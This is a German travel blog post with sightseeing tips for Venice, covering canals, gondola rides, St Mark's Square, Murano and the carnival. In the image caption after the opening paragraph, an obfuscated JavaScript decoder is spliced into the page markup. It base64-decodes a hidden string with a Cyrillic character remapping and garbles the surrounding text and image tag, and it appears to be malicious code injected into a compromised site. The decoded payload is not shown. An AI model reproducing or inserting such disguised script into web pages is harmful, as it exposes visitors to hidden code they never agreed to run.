Reisetipps für eine Städtereise nach Venedig

Venedig, die im Norden gelegene italienische Stadt, liegt an der Adria und blickt auf eine lange, bewegte Geschichte zurück, die bis zu den Etruskern zurückreicht. Die Lagunenstadt besteht aus mehreren Inseln und ist für die Touristen ein absolutes Reisehighlight, weil die ganze Stadt von Kanälen durchzogen ist. In Venedig möchte der romantische Urlauber nach dem Tauschen der Verlobungsringe eine schöne Zeit zu Zweit verbringen. Derweil taucht der kunstbeflissene Tourist in die Tiefen der italienischen und venezianischen Kultur ein. In dieser Stadt spürt der Feriengast den Hauch tiefer christlicher Verbundenheit und die Unverwechselbarkeit italienischen Lebensstils.

Gr<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand-Kanal Venedig (c) Damian Ptok / pixelio.de" title="503710_R_by_Damian Ptok_pixelio.de" width="600" height="452" class="size-full wp-image-342" />

Schon bei einem Stadtbummel merkt man sofort wie eng Venedig noch heute mit ihrer Geschichte verbunden ist, denn die Stadt ist übersäht mit schönen Kulturdenkmälern und Gebäuden, die schon die Touristen früherer Jahrhunderte bewundert haben. Dort, wo schon Goethe und George Sand die Schönheit dieser Stadt bewunderten, kann man auch noch heute dieselben Paläste und Gebäude sehen. Natürlich möchte heute viele Touristen auch auf dem Markusplatz bei einem Espresso die Tauben beobachten oder über die vielen Brücken dieser Stadt spazieren. Empfehlenswert ist auch eine Gondelfahrt durch die vielen kleinen Kanäle der Stadt. So eine Gondelfahrt ist ein beeindruckendes Erlebnis und man sieht die vielen Paläste und Gebäude von einer anderen, sehr schönen Seite.

Bei einem Bummel durch Venedig kann man die verschiedenste Kirchen in der ganzen Pracht der vergangen Jahrhunderte entdecken. Ob Dogenpalast oder der Palast des Patriarchen, in Venedig haben die Menschen vergangener Jahrhunderte bei ihren Bauten im puren Luxus geschwelgt. Neben architektonischen Schönheiten wird in den letzten Jahren aber auch immer mehr das moderne Venedig mit vielen neuen Bauten in Szene gesetzt. Für alle Venedigbesucher ist es aber auch fast schon Pflicht die Insel Murano zu besuchen und hier die Exponate einer überragenden Glasmanufaktur zu besichtigen. Die italienische Stadt ist auf jeden Fall eines der besonderen Reiseziele dieser Erde, bietet viel italienisches Flair und ein unterhaltsames Kulturprogramm der Sonderklasse.

Tipps: Wer während seines Urlaubs in Venedig etwas ganz Besonderes erleben möchte, der sollte die Stadt in der Zeit des berühmten Karnevals besuchen. Neben den klassischen Hotels kann man auch mal bei wimdu und 9flats nach einer günstigen Unterkunft ausschau halten.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg